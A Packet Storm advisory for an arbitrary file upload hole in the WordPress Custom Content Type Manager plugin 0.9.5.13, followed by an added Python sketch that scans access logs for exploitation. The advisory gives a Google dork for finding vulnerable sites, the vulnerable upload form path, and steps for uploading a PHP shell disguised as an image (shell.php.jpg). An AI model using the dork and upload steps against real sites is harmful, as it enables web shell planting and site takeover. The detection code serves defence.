WordPress Custom Content Type Manager 0.9.5.13-pl Shell Upload

2012-06-12T00:00:00
ID PACKETSTORM:113520
Type packetstorm
Reporter Adrien Thierry
Modified 2012-06-12T00:00:00

Description

                                        
`###########################################################
#  
# Exploit Title: WordPress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/custom-content-type-manager/  
# Date: 11/06/2012  
# Exploit Author: Adrien Thierry  
# Vendor Homepage: http://www.fireproofsocks.com/  
# Software Link: http://downloads.wordpress.org/plugin/custom-content-type-manager.0.9.5.13.zip  
# Version: 0.9.5.13  
#  
###########################################################  
  
Vulnerable page: http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php
  
exploit :  
  
http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php  
  
-> upload your shell with an image extension (jpg|png|gif)
  
shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg  
  
#####################################################################  
`
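
Detection sketch for the pattern described above, added as an example and not part of the original advisory: it scans web access logs for POSTs to the plugin's upload_form.php and for requests to files under wp-content/uploads/[YYYY]/[MM]/ whose name carries a script extension before the image extension (such as .php.jpg). The combined log format, the script-extension list, the use of POST, and the sample log lines are assumptions made for illustration.

```python
import re

# Assumed list of extensions a web server may pass to the PHP interpreter.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pht"}
# Plugin path taken from the advisory.
UPLOAD_FORM = "/wp-content/plugins/custom-content-type-manager/upload_form.php"
# Upload location from the advisory: /wp-content/uploads/[YYYY]/[MM]/<file>
UPLOADS_RE = re.compile(r"/wp-content/uploads/\d{4}/\d{2}/([^/\s]+)$")
# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2012:10:00:01 +0000] '
    '"GET /wp-content/uploads/2012/06/photo.jpg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Jun/2012:10:02:13 +0000] '
    '"POST /wp-content/plugins/custom-content-type-manager/upload_form.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Jun/2012:10:02:40 +0000] '
    '"GET /wp-content/uploads/2012/06/shell.php.jpg HTTP/1.1" 200 48',
]

def has_embedded_script_ext(filename):
    """True if any dot-separated part after the base name is a script extension."""
    parts = filename.lower().split(".")
    return any(part in SCRIPT_EXTS for part in parts[1:])

def scan_log(lines):
    """Return (client_ip, rule, path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, uri, _status = m.groups()
        path = uri.split("?", 1)[0]
        # Assumption: the upload form submits via POST.
        if method == "POST" and path.endswith(UPLOAD_FORM):
            findings.append((ip, "upload_form_post", path))
            continue
        hit = UPLOADS_RE.search(path)
        if hit and has_embedded_script_ext(hit.group(1)):
            findings.append((ip, "script_ext_in_uploads", path))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same has_embedded_script_ext check can be run over file names listed from the uploads directory on disk to find files that were stored but not yet requested.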